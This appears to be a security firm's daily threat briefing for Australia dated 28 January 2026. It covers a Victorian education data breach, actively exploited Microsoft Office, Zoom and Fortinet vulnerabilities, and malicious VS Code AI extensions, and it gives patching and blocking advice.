Daily Threat Briefing: Australia – 28 January 2026

Executive Summary

The Australian cyber threat landscape over the last 24 hours has been dominated by a significant data breach within the Victorian education sector and the emergency disclosure of critical vulnerabilities affecting widespread enterprise tools. Threat actors are actively exploiting zero-day vulnerabilities in Microsoft Office and Zoom, while a new supply chain attack targeting developers using AI tools has been uncovered. Australian organisations, particularly in Government, Education, and FinTech, must prioritise patching and threat hunting immediately.

Local Impact: Victorian Education Sector Breach

Victorian Department of Education Hit by Major Data Breach A significant incident has been confirmed involving the Victorian Department of Education, impacting approximately 1,700 government schools. Unauthorised third-party access has compromised the personal information of current and former students.

  • Impact: Loss of PII (Personally Identifiable Information) creating heightened risk of identity theft and targeted phishing scams against students and families.
  • Action: Educational institutions should be on high alert for follow-on social engineering attacks. Parents and staff should be warned to scrutinise unsolicited communications purportedly from the Department or schools.

Critical Vulnerabilities & Global Threats

1. Microsoft Office Zero-Day (CVE-2026-21509)

  • Severity: Critical
  • Status: Active Exploitation / Emergency Patch Issued (27 Jan 2026)
  • Details: A remote code execution (RCE) vulnerability in Microsoft Office is being actively exploited in the wild. The flaw allows attackers to execute arbitrary code via specially crafted documents, often delivered via phishing emails.
  • Recommendation: Apply the emergency patch immediately. Ensure EDR solutions are tuned to detect abnormal Office process behaviour.

2. Zoom Node Multimedia Routers RCE (CVE-2026-22844)

  • Severity: Critical
  • Details: A command injection flaw in Zoom Node Multimedia Routers (used in Meeting Connector and Hybrid deployments) allows for remote code execution.
  • Relevance: High for organisations hosting on-premise or hybrid Zoom infrastructure.
  • Recommendation: Update to version 5.2.1716.0 or later immediately.

3. Fortinet SSO Authentication Bypass (CVE-2025-59718/59719 Variant)

  • Status: Active Exploitation of Patched Devices
  • Details: Threat intelligence indicates active exploitation of a FortiCloud SSO authentication bypass, even on devices believed to be fully patched. Attackers are using crafted SAML messages to create persistent accounts and enable VPN access.
  • Recommendation: Review audit logs for suspicious SAML assertions and anomalous VPN logins. Consider temporarily disabling SSO if suspicious activity is detected until further vendor guidance is clarified.

Emerging Trends: AI & Supply Chain Attacks

Malicious VS Code AI Extensions Cybersecurity researchers have identified two malicious Visual Studio Code extensions masquerading as AI coding assistants: "ChatGPT - 中文版" and "ChatGPT - ChatMoss".

  • Threat: These extensions, with over 1.5 million combined installs, contain backdoor functionality that siphons source code and developer environment data to servers located in China.
  • Sector Risk: High for SaaS Providers, FinTech, and DevOps teams where proprietary code is the crown jewel.
  • Action: Audit developer environments for these extensions immediately and block their IDs (whensunset.chatgpt-china, zhukunpeng.chat-moss).

Sector-Specific Intelligence

  • Healthcare: The Australian Signals Directorate (ASD) continues to report a surge in ransomware targeting healthcare providers, with incidents doubling compared to the previous period. Threat actors are leveraging the chaos of recent breaches to launch extortion campaigns.
  • Government: The NSW Government is rolling out a new framework to make AI risk assessments less subjective. Agencies deploying AI tools must now undergo rigorous testing for bias and security vulnerabilities before deployment.
  • IoT: With the exploitation of edge devices like Fortigate and Zoom routers, organisations must treat IoT and edge appliances as high-risk entry points. Ensure strict network segmentation is in place to prevent lateral movement.

Analyst’s Take

The breach in Victoria serves as a stark reminder that the education sector remains a soft target with high-value data. However, the technical sophistication seen in the Fortinet bypass and the malicious VS Code extensions indicates that threat actors are moving deeper into the supply chain and infrastructure layer. Defensive teams must look beyond the perimeter and scrutinise the tools their developers and remote workforce rely on daily.

Contact us for a quote for penetration testing service or adversary simulation.

Contact us for a quote